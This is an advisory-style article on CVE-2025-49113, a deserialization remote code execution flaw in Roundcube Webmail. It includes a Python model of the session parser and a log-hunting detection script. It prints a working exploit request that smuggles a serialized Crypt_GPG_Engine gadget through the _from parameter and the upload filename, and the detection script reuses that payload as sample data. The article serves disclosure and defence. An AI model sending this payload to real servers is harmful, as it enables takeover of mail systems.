Recent security disclosures have revealed that Roundcube Webmail, the world’s most widely deployed open-source webmail client, is being actively attacked through a critical post-authentication remote code execution (RCE) vulnerability tracked as CVE-2025-49113.
Security specialists estimate that over 84,000 vulnerable instances remained unpatched worldwide as of early June 2025. This figure highlights the urgent need for organizations, from ISPs to government agencies and educational institutions, to patch their installations.
CVE-2025-49113 stems from flaws in session handling and PHP object deserialization in Roundcube versions 1.1.0 through 1.5.9 and 1.6.x through 1.6.10, and affects millions of users globally.
These vulnerable versions are bundled by major hosting providers such as Hostinger, GoDaddy, Dreamhost, OVH, and Gandi, as well as popular control panels like cPanel, Plesk, and DirectAdmin.
With active exploitation already observed, including activity in underground markets, this vulnerability presents a clear and present danger. The suspicion that state actors are leveraging the flaw for targeted attacks only adds to the gravity of the situation.
Technical Analysis
Session Handling and PHP Object Deserialization
Roundcube uses a custom session handler that stores state data in a variety of backends, including MySQL, PostgreSQL, Redis, and Memcached. The session storage format is largely based on PHP’s native serialization, with a few twists. Each stored session is parsed by a helper method, unserialize(), in ./program/lib/Roundcube/rcube_session.php.
Session Corruption and Injection
Vulnerability researchers discovered that a subtle flaw in the session handler’s logic—specifically, the improper handling of keys beginning with an exclamation mark (!)—allowed attackers to corrupt session data. By manipulating the session key in combination with user-provided data (like file uploads), an attacker could inject arbitrary data into the session.
Consider the following example of the session data format:
temp|b:1;language|s:5:"en_US";task|s:5:"login";...
If a session key begins with a !, such as !temp, the session handler fails to parse the entry correctly, leading to session corruption:
!temp|b:1;language|s:5:"en_US";...
This results in the following corrupted output during session unserialization:
a:...{s:4:"temp";N;s:10:"1;language";s:5:"en_US";...}
Notice how the key "1;language" appears, breaking the intended session structure and enabling further exploitation.
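To make the parsing failure concrete, here is an added illustration written for this article. It is a simplified model, not Roundcube's rcube_session.php, and covers only scalar entries; the session blobs it parses are constructed for the demonstration. The model implements the one rule that matters here: a !name| entry marks a removed variable and carries no value, so the parser records null and resumes scanning at the very next byte. Because it is simplified, the exact key boundary in its corrupted output can differ from the byte-exact result of Roundcube's handler; what it shows is the mechanism, namely that value bytes left unconsumed after a !-key are scanned as the start of the next key. The audit function at the end is a heuristic a defender could run over stored session rows to spot shifted keys or a serialized object smuggled into a string value.

```python
"""Simplified model of the Roundcube-style session format discussed above.

Added illustration for this article; NOT Roundcube's rcube_session.php.
Scalars only (bool, int, string, null), plus the '!name|' removed-variable
marker whose mishandling causes the key shift.
"""
import re
from typing import Any


def _parse_value(blob: str, p: int) -> tuple[Any, int]:
    """Parse one serialized scalar at offset p; return (value, offset after it)."""
    tag = blob[p]
    if tag == "N":                                   # N;
        return None, p + 2
    if tag in "bi":                                  # b:1;  i:-5;
        end = blob.index(";", p)
        raw = blob[p + 2:end]
        return (raw == "1") if tag == "b" else int(raw), end + 1
    if tag == "s":                                   # s:5:"en_US";
        colon = blob.index(":", p + 2)
        length = int(blob[p + 2:colon])              # ASCII-only; PHP counts bytes
        start = colon + 2                            # skip ':"'
        return blob[start:start + length], start + length + 2   # skip '";'
    raise ValueError(f"unsupported tag {tag!r} at offset {p}")


def parse_session(blob: str) -> dict[str, Any]:
    """Walk name|value entries; a '!name|' entry yields None and consumes no value."""
    session: dict[str, Any] = {}
    p, n = 0, len(blob)
    while p < n:
        q = blob.find("|", p)
        if q < 0:
            break
        if blob[p] == "!":
            # Removed-variable marker: record null and do NOT read a value.
            # Whatever bytes follow the marker are re-scanned as the start of
            # the next key, which is the corruption the article describes.
            session[blob[p + 1:q]] = None
            p = q + 1
        else:
            name = blob[p:q]
            value, p = _parse_value(blob, q + 1)
            session[name] = value
    return session


OBJECT_HEADER = re.compile(r'O:\d+:"')   # start of a serialized PHP object


def audit_session(blob: str) -> list[str]:
    """Heuristic checks a defender can run over stored session rows (scalar subset)."""
    findings = []
    for name, value in parse_session(blob).items():
        if re.search(r'[;:{}"]', name):
            findings.append(f"key {name!r} contains serialized-value syntax (shifted parse)")
        if isinstance(value, str) and OBJECT_HEADER.search(value):
            findings.append(f"value of {name!r} embeds a serialized PHP object")
    return findings


# Constructed sample blobs (not captured from a real installation).
NORMAL = 'temp|b:1;language|s:5:"en_US";task|s:5:"login";'
REMOVED_OK = '!temp|language|s:5:"en_US";'            # marker with no value: fine
CORRUPT = '!temp|b:1;language|s:5:"en_US";'           # marker followed by a value: shift
INJECTED = 'temp|b:1;preferences|s:38:"a:1:{i:0;O:16:"Crypt_GPG_Engine":0:{}}";'

if __name__ == "__main__":
    for label, blob in [("normal", NORMAL), ("removed", REMOVED_OK),
                        ("corrupt", CORRUPT), ("injected", INJECTED)]:
        print(label, parse_session(blob), audit_session(blob))
```

Run the file directly to see the three parses side by side: the legitimate removed-variable marker parses cleanly, while the marker followed by leftover value bytes turns "b:1;language" into a key, which the audit flags along with the object header hidden inside the preferences string.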
Weaponizing the Vulnerability: RCE via Upload
The primary attack vector involves the Roundcube settings upload handler (./program/actions/settings/upload.php), where the $_GET['_from'] parameter is insufficiently sanitized. By uploading a file and manipulating the _from parameter and file name, an attacker can inject arbitrary data into the session.
Here’s an example of a manipulated file upload request:
POST /?_from=edit-!";i:0;O:16:"Crypt_GPG_Engine":1:{S:26:"\00Crypt_GPG_Engine\00_gpgconf";S:18:"touch+/tmp/pwned;#";}i:0;b:0;}";}}&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload HTTP/1.1
Host: roundcube.local
X-Requested-With: XMLHttpRequest
Accept-Encoding: identity
Content-Length: 242
-----------------------------WebKitFormBoundary
Content-Disposition: form-data; name="_file[]"; filename="x|b:0;preferences_time|b:0;preferences|s:179:\"a:3:{i:0;s:57:\".png"
Content-Type: image/png
IMAGE
-----------------------------WebKitFormBoundary--
This payload injects a serialized object into the session. When that session data is later deserialized, the object is instantiated and leads to remote code execution via the Crypt_GPG_Engine class from the PEAR Crypt_GPG library bundled with Roundcube.
Key Points:
- Post-Authentication: The attacker must be authenticated (valid username/password required).
- No WAF Detection: The exploit is not detected by standard web application firewalls.
- Widespread Impact: Affects all default installations and bundled versions by major providers.
Mitigation and Recommendations
Patched Versions:
- Roundcube 1.6.11 (latest stable)
- Roundcube 1.5.10 (LTS)
Urgent Actions for Organizations:
- Immediate Patching: Upgrade all Roundcube installations to the latest patched versions.
- Monitor for Exploit Attempts: Watch for settings upload requests with malformed _from parameters or file names, session entries containing serialized PHP objects, and other RCE indicators.
- Vendor Coordination: Hosting providers and control panel vendors should prioritize patch deployment and customer notification.
- Security Awareness: Educate users about phishing and credential theft, as the exploit requires valid credentials.
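The monitoring recommendation above can be turned into a concrete check. The following is an added example written for this article, not Roundcube code and not a vendor signature. It scans constructed access-log lines for the request shape shown in the technical analysis (a POST to the settings upload handler whose _from parameter carries serialized-PHP syntax or the Crypt_GPG_Engine gadget name) and separately checks multipart file names for session-entry syntax. The benign _from=edit-identity token, the user names and the documentation-range IP addresses are assumptions made for the sample.

```python
"""Hunting for CVE-2025-49113 exploitation attempts in web server access logs.

Added example for this article; not Roundcube code, not a vendor signature.
It encodes the request shape from the technical analysis: a settings upload
(_task=settings, _action=upload) whose _from parameter or multipart filename
carries serialized-PHP syntax instead of a plain token.
"""
import re
from urllib.parse import parse_qs, quote, urlsplit

# Serialized-PHP syntax and the '!' that abuses the session handler. None of
# these belong in a legitimate _from token (assumed to look like 'edit-identity').
SUSPICIOUS_FROM = re.compile(r'[!;"{}]|O:\d+:"')
# A filename smuggling session entries ('name|value;') or PHP string headers.
SUSPICIOUS_FILENAME = re.compile(r'[|;]|\bs:\d+:')
# Request line of a common/combined access-log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def flag_request(method: str, target: str) -> list[str]:
    """Return the reasons a request (method + path?query) looks like an attempt."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)

    def first(key: str) -> str:
        return params.get(key, [""])[0]

    reasons: list[str] = []
    if method != "POST" or first("_task") != "settings" or first("_action") != "upload":
        return reasons                    # only the settings upload handler is in scope
    if SUSPICIOUS_FROM.search(first("_from")):
        reasons.append("serialized-PHP syntax in _from of a settings upload")
    if "Crypt_GPG_Engine" in first("_from"):
        reasons.append("gadget class name Crypt_GPG_Engine in _from")
    return reasons


def flag_upload_filename(filename: str) -> list[str]:
    """Check the multipart filename, which the exploit also uses to inject data."""
    if SUSPICIOUS_FILENAME.search(filename):
        return ["session-entry syntax in uploaded filename"]
    return []


def scan_access_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line index, reasons) for every log line that trips a check."""
    hits = []
    for i, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = flag_request(m["method"], m["target"])
        if reasons:
            hits.append((i, reasons))
    return hits


# The _from value from the request shown in the technical analysis.
EXPLOIT_FROM = ('edit-!";i:0;O:16:"Crypt_GPG_Engine":1:{S:26:"\\00Crypt_GPG_Engine\\00_gpgconf";'
                'S:18:"touch+/tmp/pwned;#";}i:0;b:0;}";}}')

# Constructed log lines; user names and IPs (documentation ranges) are made up.
SAMPLE_LOGS = [
    '198.51.100.7 - alice [04/Jun/2025:09:15:02 +0000] '
    '"POST /?_task=settings&_action=upload&_from=edit-identity&_id=1 HTTP/1.1" 200 311',
    '203.0.113.10 - mallory [04/Jun/2025:09:16:41 +0000] '
    f'"POST /?_from={quote(EXPLOIT_FROM, safe="")}&_task=settings&_framed=1&_remote=1'
    '&_id=1&_uploadid=1&_unlock=1&_action=upload HTTP/1.1" 200 242',
    '198.51.100.7 - alice [04/Jun/2025:09:17:00 +0000] '
    '"GET /?_task=mail&_action=list HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for idx, why in scan_access_log(SAMPLE_LOGS):
        print(f"line {idx}: {'; '.join(why)}")
    print(flag_upload_filename('x|b:0;preferences_time|b:0;preferences|s:179:\\"a:3:{i:0;s:57:\\".png'))
```

The query-string check is deliberately narrow (POST to _task=settings&_action=upload only) so it does not fire on ordinary mail traffic; the filename check has to be run where the multipart body is visible, for example in a proxy or WAF rule rather than the access log, since the access log does not record it.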
Message to Security Teams and Researchers:
This vulnerability underscores the need for rapid response when the threat landscape shifts. When exploit details are public and weaponized, defenders must have access to clear, accurate, and actionable information, as is the case here.
The ongoing exploitation of CVE-2025-49113 is a stark reminder of the risks inherent in widely deployed, open-source software. With over 84,000 vulnerable webmail servers at risk, immediate action is critical to prevent further compromise. Organizations must prioritize patch management and remain vigilant in monitoring for emerging threats.